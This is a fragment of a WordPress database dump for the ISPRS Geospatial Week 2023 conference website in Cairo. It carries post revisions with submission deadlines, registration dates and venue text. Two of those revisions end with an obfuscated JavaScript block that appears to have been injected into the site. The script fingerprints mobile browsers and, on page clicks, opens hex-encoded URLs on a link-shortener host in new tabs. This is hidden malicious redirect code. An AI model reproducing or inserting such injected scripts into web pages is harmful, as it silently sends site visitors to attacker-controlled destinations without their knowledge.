)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IMPORTANT DATES','','inherit','closed','closed','','2654-revision-v1','','','2023-04-02 01:07:48','2023-04-02 01:07:48','',2654,'https://gsw2023.com/?p=3983',0,'revision','',0),
(3984,1,'2023-04-02 01:09:02','2023-04-02 01:09:02','<p>[vc_row][vc_column][vc_column_text]<span style=\"font-size: 14pt;\"><strong>Submit Abstracts/Papers</strong></span></p>\n<p>&nbsp;</p>\n<p>The ISPRS Geospatial Week 2023 (GSW’2023) has been opened for paper submission. After creation of an account on the <a href=\"https://www.conftool.com/gsw2023\"> ConfToool website of the Geospatial Week</a>, authors can submit either a full paper or an extended abstract to one of the 26 Workshops available in GSW’2023</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][dt_portfolio_slider number=\"27\" order=\"asc\" padding=\"30\" appearance=\"from_bottom\" content_aligment=\"center\" show_title=\"true\" show_link=\"true\" show_details=\"true\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][vc_separator style=\"shadow\" border_width=\"10\"][bsf-info-box icon_size=\"32\"]The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\">ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\">ISPRS reviewing process</a>. <strong>Note that Full papers should be submitted anonymously</strong><strong>. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</strong></p>\n<p>&nbsp;</p>\n<p>Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\">ISPRS Archives</a>.</p>\n<div class=\"three_quarter first\">\n<div id=\"respond\"></div>\n</div>\n<p>[/bsf-info-box][vc_column_text]</p>\n<div class=\"three_quarter first\">\n<div class=\"gap-10\">\n<h5></h5>\n</div>\n</div>\n<div class=\"three_quarter first\">\n<p><span style=\"font-size: 14pt;\"><strong>Important Dates:</strong></span></p>\n<ol>\n<li><span style=\"font-size: 12pt;\"><strong> Annals (Fully Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</li>\n<li>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></li>\n<li>Camera ready paper submission: June 15, 2023 <span style=\"text-decoration: line-through;\">June 1, 2023</span></li>\n<li><strong>Priority well be given to early Submissions</strong></li>\n</ul>\n<p>&nbsp;</p>\n<ol start=\"2\">\n<li><span style=\"font-size: 12pt;\"><strong> Archives (Abstract Reviewed Papers):</strong></span></li>\n</ol>\n<ul>\n<li>Abstracts submission (Archives): April 15, 2023 (hard deadline, no extension)</li>\n<li>Abstracts Author notification:  May 15, 2023</li>\n<li>Camera ready paper submission: June 1, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration deadlines</strong></span></p>\n<ul>\n<li>Early bird registration deadline: June 1, 2023</li>\n<li>Late registration deadline: July 15, 2023</li>\n</ul>\n<p>&nbsp;</p>\n<p><strong><span style=\"font-size: 14pt;\">Useful links:</span></strong></p>\n<p><a href=\"https://www.conftool.com/gsw2023\">ConfToool website of the Geospatial Week2023</a></p>\n<p><a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\">Guidelines for Authors</a></p>\n<p><a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\">Reviewing process for ISPRS Events</a></p>\n<p>&nbsp;</p>\n</div>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2023-04-02 01:09:02','2023-04-02 01:09:02','',2659,'https://gsw2023.com/?p=3984',0,'revision','',0),
(3985,1,'2023-04-02 01:13:03','2023-04-02 01:13:03','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):</strong></p>\n<p><strong>15 April 2023</strong><br />\n<strong style=\"color:white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: 15 May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Payment of Registration will Open Soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px 